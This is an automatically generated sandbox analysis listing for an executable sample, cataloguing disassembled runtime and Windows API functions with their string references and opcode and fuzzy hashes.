_invalid_parameter_noinfo.LIBCMT ref: 00007FF7C01AB745

Strings

, xrefs: 00007FF7C01AB6CE
*, xrefs: 00007FF7C01AB679

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo
String ID: $*
API String ID: 3215553584-3982473090
Opcode ID: d78f14ac5553cfb584130670f8383fb7251d5d940d13a47ddc6d8be45c653cc9
Instruction ID: 9d5b26cea44529c1b62da35851956e5a4923badb0c1fbc8ae42cda73f2df2f2d
Opcode Fuzzy Hash: d78f14ac5553cfb584130670f8383fb7251d5d940d13a47ddc6d8be45c653cc9
Instruction Fuzzy Hash: CB51487290D6818BE7656E35A09437CFBA0EB05F28F941135C64D813D6CF2CF6A5CEA1

Function 00007FF7C01A9C30 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7C01A87A0: abort.LIBCMT ref: 00007FF7C01A87B3

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF7C01A9CDA
_CreateFrameInfo.LIBVCRUNTIME ref: 00007FF7C01A9D06

Strings

csm, xrefs: 00007FF7C01A9E06

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: CreateFrameInfo__except_validate_context_recordabort
String ID: csm
API String ID: 2466640111-1018135373
Opcode ID: 3b2257290adfa2781d5b09c2d1616d864f17ca53d9f431228db0fbfec44e584e
Instruction ID: 17bd5decc861aa721f47f07e079e4f95020086f01dc519396ec39e8ac6f7ded0
Opcode Fuzzy Hash: 3b2257290adfa2781d5b09c2d1616d864f17ca53d9f431228db0fbfec44e584e
Instruction Fuzzy Hash: E5514D36A1874187D620EF55F44026EF7A4FB88BA0F900534DB8D87B56CF38E4A1CB90

Function 00007FF7C01B7874 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32 ref: 00007FF7C01B795A
WriteFile.KERNEL32 ref: 00007FF7C01B798D
GetLastError.KERNEL32 ref: 00007FF7C01B79AF

Strings

U, xrefs: 00007FF7C01B7938

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: ByteCharErrorFileLastMultiWideWrite
String ID: U
API String ID: 2456169464-4171548499
Opcode ID: d20302cc878b90de32ea97a9ef5a303d772ca5a33c3583031ee23a301797e927
Instruction ID: 0c2142bff4e5223e2822779643f80b69a0148e86e4205ae9be0d4050d5dda428
Opcode Fuzzy Hash: d20302cc878b90de32ea97a9ef5a303d772ca5a33c3583031ee23a301797e927
Instruction Fuzzy Hash: 7D418162619A4586EB10AF55F8443BEE7A1FB88BA4F805031EE4D87788DF7CE541CB90

Function 00007FF7C019CCEC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83COMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00007FF7C019CD15
GetObjectW.GDI32 ref: 00007FF7C019CD43
ReleaseDC.USER32 ref: 00007FF7C019CDF7

Strings

, xrefs: 00007FF7C019CD8F

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: ObjectRelease
String ID:
API String ID: 1429681911-3916222277
Opcode ID: 617a757d8815b9cd64aff0be7c79d33489404464c5a4c9318e7e7076e56f3154
Instruction ID: 73819c735f1fdaa945e132d5a28d82343b6c31678f997ccc7cc1a3fc9542e443
Opcode Fuzzy Hash: 617a757d8815b9cd64aff0be7c79d33489404464c5a4c9318e7e7076e56f3154
Instruction Fuzzy Hash: 90315A3661875187DA04EF22B80862EF7A1FB88FE1F904139ED5A83B55CF3CE1498B40

Function 00007FF7C019C21C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00007FF7C019C228
GetDeviceCaps.GDI32 ref: 00007FF7C019C239
ReleaseDC.USER32 ref: 00007FF7C019C246

Strings

, xrefs: 00007FF7C019C24C

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: CapsDeviceRelease
String ID:
API String ID: 127614599-3916222277
Opcode ID: a4f30ad7dfa2e76a7ae327bbc05fad838edf44ef71ac395416f8be742774f962
Instruction ID: 49beffaf12414c586b28a4d4e7139b0f9b353d0f50ca444408b51dcf911a4d9d
Opcode Fuzzy Hash: a4f30ad7dfa2e76a7ae327bbc05fad838edf44ef71ac395416f8be742774f962
Instruction Fuzzy Hash: 3FE08C21B08645C3EB486BB6F58D12EA261AB8CFE0F954039DE1E83784DE3DD4854300

Function 00007FF7C0187644 Relevance: 6.3, APIs: 4, Instructions: 281COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C0187915
FoldStringW.KERNEL32 ref: 00007FF7C018795F
FoldStringW.KERNEL32 ref: 00007FF7C01879B3
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C0187A22

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: FoldString_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 2025052027-0
Opcode ID: c9fe3392ab09c49d1196f8df235d0463f4d9b61ecd1758375ad174dc9803bd61
Instruction ID: e6e7cc57aa43592427f85a2d149107cb85c407e9dff671fb6bec461634defcee
Opcode Fuzzy Hash: c9fe3392ab09c49d1196f8df235d0463f4d9b61ecd1758375ad174dc9803bd61
Instruction Fuzzy Hash: D3B1C222E2864682EA10AF19F04856DF361FB45FA4F964631DA1D87790DF7CF790C3A2

Function 00007FF7C018FCDC Relevance: 6.1, APIs: 4, Instructions: 122COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF7C018FD90
SetLastError.KERNEL32 ref: 00007FF7C018FE2B

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 9fe865261a2bdbfc69447d7f073232b66b0883da029528855bf010fd97c510b6
Instruction ID: 0cd0cd0ecbe649f2cbdc33226ff158a92a9f73333f621088ab6302708fb7427e
Opcode Fuzzy Hash: 9fe865261a2bdbfc69447d7f073232b66b0883da029528855bf010fd97c510b6
Instruction Fuzzy Hash: 0A51B962B1474696FB00BF64E4442ECE361EB44FA8F814235DA1C97796EF2CF644C3A1

Function 00007FF7C019D908 Relevance: 6.1, APIs: 4, Instructions: 106COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF7C019D934
GetLastError.KERNEL32 ref: 00007FF7C019D980
CreateDirectoryW.KERNEL32 ref: 00007FF7C019DA88
LocalFree.KERNEL32 ref: 00007FF7C019DA98

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: CreateCurrentDirectoryErrorFreeLastLocalProcess
String ID:
API String ID: 1077098981-0
Opcode ID: 02d44a4f672a4ff076bd7af01b23eac749c9e801f4074d58631ddee5945a2c64
Instruction ID: 13e38152de996c9f72fd4f019da8f85795347a3e096433012582e82089427fa1
Opcode Fuzzy Hash: 02d44a4f672a4ff076bd7af01b23eac749c9e801f4074d58631ddee5945a2c64
Instruction Fuzzy Hash: 74515E32A28B4287EB10AF21F44476EE3A5FB84B94F900035EA4D97B58DF3CE554CB90

Function 00007FF7C01B106C Relevance: 6.1, APIs: 4, Instructions: 104COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7C01B10BF
WideCharToMultiByte.KERNEL32 ref: 00007FF7C01B1191
GetLastError.KERNEL32 ref: 00007FF7C01B11B4
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7C01B11E6

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
String ID:
API String ID: 4141327611-0
Opcode ID: 8d9a5625d90a928a2b0668c470320c834cfc61c5ffddc2be44e89749fafbb7da
Instruction ID: 364616d8ed0603465e2fd38375d3f390278470db12d45952a5037d4a64d0ebb8
Opcode Fuzzy Hash: 8d9a5625d90a928a2b0668c470320c834cfc61c5ffddc2be44e89749fafbb7da
Instruction Fuzzy Hash: CA4192A2A0868247FB65BF25B54037DE6A0AF80FB0FD54130DF5986B95CF2CF94186A0

Function 00007FF7C01B4008 Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF7C01AF93B), ref: 00007FF7C01B4021
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF7C01AF93B), ref: 00007FF7C01B4083
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF7C01AF93B), ref: 00007FF7C01B40BD
FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF7C01AF93B), ref: 00007FF7C01B40E7

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$Free
String ID:
API String ID: 1557788787-0
Opcode ID: 6509991160e12f712ad6d4b27e048ebbd13574e2c5e48816f306a01bcccb75f3
Instruction ID: af07289128c1e174a3b0369d10720769ab5956d0b57282c6d4783bb50a539e10
Opcode Fuzzy Hash: 6509991160e12f712ad6d4b27e048ebbd13574e2c5e48816f306a01bcccb75f3
Instruction Fuzzy Hash: AF215071A0879587E620BF12744006DF6A4EB44FE0B888134EF9EA3B95DF3CF4528754

Function 00007FF7C01B0950 Relevance: 6.0, APIs: 4, Instructions: 43COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF7C01AB380,?,?,00000050,00007FF7C01AD3C1), ref: 00007FF7C01B095A
SetLastError.KERNEL32(?,?,?,00007FF7C01AB380,?,?,00000050,00007FF7C01AD3C1), ref: 00007FF7C01B09C2
SetLastError.KERNEL32(?,?,?,00007FF7C01AB380,?,?,00000050,00007FF7C01AD3C1), ref: 00007FF7C01B09D8
abort.LIBCMT ref: 00007FF7C01B09DE

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: ErrorLast$abort
String ID:
API String ID: 1447195878-0
Opcode ID: 1eac2c9eaf67b8ca3847dbe3d1f8f0efe6c7906f8c8004aecd08eca7f3519a74
Instruction ID: 13d6145982dbdb7c19a831208e9748fedefe3957909f0585040a03860bf229fa
Opcode Fuzzy Hash: 1eac2c9eaf67b8ca3847dbe3d1f8f0efe6c7906f8c8004aecd08eca7f3519a74
Instruction Fuzzy Hash: FE018B90A086064BFA5A7F22B29513DD2915F44FB0F800538ED2EC2BC6EF6CF80042B4

Function 00007FF7C019C1CC Relevance: 6.0, APIs: 4, Instructions: 21COMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00007FF7C019C1D4
GetDeviceCaps.GDI32 ref: 00007FF7C019C1EA
GetDeviceCaps.GDI32 ref: 00007FF7C019C1FE
ReleaseDC.USER32 ref: 00007FF7C019C20F

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: ff8273f54fae2fdeddf750fc197cbb143a8813763f49c02ea24deae08297ea60
Instruction ID: 6c87613dc8fd006a55d80cc82974fc9265708d096d8f48492d2ddd8a92593039
Opcode Fuzzy Hash: ff8273f54fae2fdeddf750fc197cbb143a8813763f49c02ea24deae08297ea60
Instruction Fuzzy Hash: A1E0C960E0960683EA086F71B81D13DD2A1AF89F61F88403DCC2E86350EF3DB08547A0

Function 00007FF7C01B1704 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7C01B1747

Strings

gfff, xrefs: 00007FF7C01B1872
e+000, xrefs: 00007FF7C01B17EF

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo
String ID: e+000$gfff
API String ID: 3215553584-3030954782
Opcode ID: 180a713344d636e9f2ed807591016252dc9e7b78ba41607e6542638bc7fc855a
Instruction ID: a7f931131b252cd74708759b717c8dc7f63d460f77359efda3d7911669105ba3
Opcode Fuzzy Hash: 180a713344d636e9f2ed807591016252dc9e7b78ba41607e6542638bc7fc855a
Instruction Fuzzy Hash: 3E5105A2B187C187E7259F35A84136DFA91BB40FB0F889231CA98C7BD5CF2CE4448750

Function 00007FF7C0189808 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7C01899A8: swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7C01899E6

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C018999C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C01899A2

Strings

SIZE, xrefs: 00007FF7C0189843

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn$swprintf
String ID: SIZE
API String ID: 449872665-3243624926
Opcode ID: 87bb56ca121dbe8459ff7cb6c827e9ac43c466e791526e995e40738a5dfd1e5c
Instruction ID: d163a8f7094328fb8a873a08ef8f7f6205c9c8e224056ffc7d2decdca9be42de
Opcode Fuzzy Hash: 87bb56ca121dbe8459ff7cb6c827e9ac43c466e791526e995e40738a5dfd1e5c
Instruction Fuzzy Hash: B241D062A1878297EA10AF14F4403ADE350EB81BB4F854335EA9C827D6EF3CE640C791

Function 00007FF7C01AF7A0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7C01AF7CA
GetModuleFileNameA.KERNEL32(?,?,?,?,?,00007FF7C01A64A5), ref: 00007FF7C01AF7EB

Strings

C:\Users\user\Desktop\ywXeiXEvP2.exe, xrefs: 00007FF7C01AF7D9

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: FileModuleName_invalid_parameter_noinfo
String ID: C:\Users\user\Desktop\ywXeiXEvP2.exe
API String ID: 3307058713-2363190917
Opcode ID: d741bd9ac7dff40685a7c943ead455491a0e4fb3fffc5812c1fd7ad0a856b466
Instruction ID: 59ef60c728c0ef0c23d45d9ff7969a16fe68d9c0fb8bf8891c3d2ef65ba1df98
Opcode Fuzzy Hash: d741bd9ac7dff40685a7c943ead455491a0e4fb3fffc5812c1fd7ad0a856b466
Instruction Fuzzy Hash: 13418C32A086668BEB15AF62B4400BDE794EB44FE4B844039EA0D87B85DF3CF45187A0

Function 00007FF7C0189A38 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON

Download Yara Rule

APIs

_snwprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7C0189AEA

Part of subcall function 00007FF7C0190688: WideCharToMultiByte.KERNEL32 ref: 00007FF7C01906B9

Strings

$%s, xrefs: 00007FF7C0189AD7
@%s, xrefs: 00007FF7C0189ACE

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide_snwprintf
String ID: $%s$@%s
API String ID: 2650857296-834177443
Opcode ID: 9a1500ef5950f5f5df7c550d69d7960993ad2cdd50597e18fe19dfb01623cb94
Instruction ID: 5b323c57ec3ec219da6361aa08e8bcb66942ad37be77d5c6e482b67e6586c923
Opcode Fuzzy Hash: 9a1500ef5950f5f5df7c550d69d7960993ad2cdd50597e18fe19dfb01623cb94
Instruction Fuzzy Hash: D431B272B18A4687EA10AF65F4406ADE3A0EB44FA4F851132EE0D97B95DF3CF605C790

Function 00007FF7C01900F8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00007FF7C01A3B27
DialogBoxParamW.USER32 ref: 00007FF7C01A3B5C

Strings

GETPASSWORD1, xrefs: 00007FF7C01A3B55

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: DialogParamVisibleWindow
String ID: GETPASSWORD1
API String ID: 3157717868-3292211884
Opcode ID: a2794da179741b2778ea55df48dbaa3dbee7a858d049ebb80305366bfd0fb870
Instruction ID: f22f37671f0cecf74005111a922065b993e954f80725db96f65e47a0d77a35aa
Opcode Fuzzy Hash: a2794da179741b2778ea55df48dbaa3dbee7a858d049ebb80305366bfd0fb870
Instruction Fuzzy Hash: BB315A21A0C68287E615AF12B4581BCE7A1EB46FA4FC80035E95D83795CF6CF554C3F0

Function 00007FF7C01B2014 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32 ref: 00007FF7C01B2086
GetFileType.KERNEL32 ref: 00007FF7C01B209C

Strings

@, xrefs: 00007FF7C01B20C7

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

